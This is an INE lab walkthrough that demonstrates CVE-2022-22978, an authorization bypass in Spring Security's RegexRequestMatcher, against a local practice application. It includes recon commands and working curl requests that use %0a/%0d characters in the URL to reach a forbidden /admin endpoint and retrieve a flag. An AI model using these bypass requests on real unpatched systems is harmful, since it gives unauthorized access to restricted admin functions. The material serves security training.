In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Introduction

What is Spring Security?

Spring Security is a powerful and highly customizable authentication and access-control framework. It is the de-facto standard for securing Spring-based applications.

Spring Security is a framework that focuses on providing both authentication and authorization to Java applications. Like all Spring projects, the real power of Spring Security is found in how easily it can be extended to meet custom requirements.

Reference: https://spring.io/projects/spring-security

Authorization Bypass in RegexRequestMatcher (CVE-2022–22978)

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-22978

NVD has assigned a base score of 9.8 (Critical) to this vulnerability!

The vulnerability

Applications using RegexRequestMatcher with a regular expression that contains . (as well as *) are likely vulnerable to an authorization bypass for versions:

• Spring Security

• 5.5.x prior to 5.5.7

• 5.6.x prior to 5.6.4

• Earlier unsupported versions

Reference: https://tanzu.vmware.com/security/cve-2022-22978

Lab Environment

In this lab environment, the user is going to get access to a low-privileged user in an Ubuntu CLI instance. The root user on the same Ubuntu instance is hosting an application leveraging Spring Security that is vulnerable to CVE-2022–22978and is accessible from the tools installed on the Ubuntu machine at http://127.0.0.1:8080.

Objective: Exploit the authorization bypass in RegexRequestMatcher, in the vulnerable Spring Security-based application to access the restricted endpoint — /admin/index.

https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/24fe9c5e-582f-4495-b8aa-20f3ddaf9770

Acknowledgments

The setup code is based on the following GitHub repository:

• https://github.com/DeEpinGh0st/CVE-2022-22978

Tools

The best tools for this lab are:

• cURL

• Nmap

Solution

Step 1: Scan the machine for open ports using Nmap.

Once the lab link is opened, you should have access to an Ubuntu CLI instance.

Run the following command to scan the machine for open ports:

Command:

nmap 127.0.0.1

Port 8080 is open!

Step 2: Check the running processes and listening connections list.

List the running processes:

Command:

ps aux

Notice the java process is running with root privileges.

Check the complete line for that process entry (we could have checked the /proc//cmdline file as well):

Command:

ps aux > out

cat out

It is a Spring Security-based application.

Check for the active listening TCP ports:

Command:

ss -pant

Port 8080 seems to be the only candidate on which the Spring Security-based application might be listening.

This can be confirmed by sending a curl request to the available candidate ports.

Step 3: Send a request to the Java application on port 8080.

Command:

curl http://127.0.0.1:8080

Notice one link in the response: /admin/index.

Request contents for that link:

Command:

curl http://127.0.0.1:8080/admin/index

The response says forbidden. It must be a route accessible to authenticated users.

Step 4: Search for Spring Cloud Authorization bypass exploits.

Search Query:

spring security authorization bypass

As stated on Snyk’s website:

org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured to be bypassed on some servlet containers when it is used with . in the regular expression.

Check the PoC link:

URL: https://github.com/ducluongtran9121/CVE-2022-22978-PoC

On this page, the exploit for the regexMatcher is listed:

We can supply %0a or %0d in the URI to bypass the authorization checks and access the restricted endpoint!

Step 5: Exploit CVE-2022–22978 to bypass the enforced authorization checks.

Send the following curl request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0aindex

The flag is retrieved back in the response:

Flag: 23e0520ade6129343e4c1d9fd63120ea

Alternatively, send the following request to bypass the authorization checks:

Command:

curl http://127.0.0.1:8080/admin/%0dindex

Curious readers can try these requests as well to bypass the authorization:

Command:

curl http://127.0.0.1:8080/admin/index%0a

Command:

curl http://127.0.0.1:8080/admin/index%0d

With that, we conclude this lab on authorization bypass in RegexRequestMatcher in Spring Security-based applications.

References

• Authorization Bypass

• CVE 2022–22978: Authorization Bypass in RegexRequestMatcher PoC

• CVE-2022–22978: Authorization Bypass in RegexRequestMatcher

• NVD: CVE-2022–22978

• CVE-2022–22978 Spring-Security bypass Demo

Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!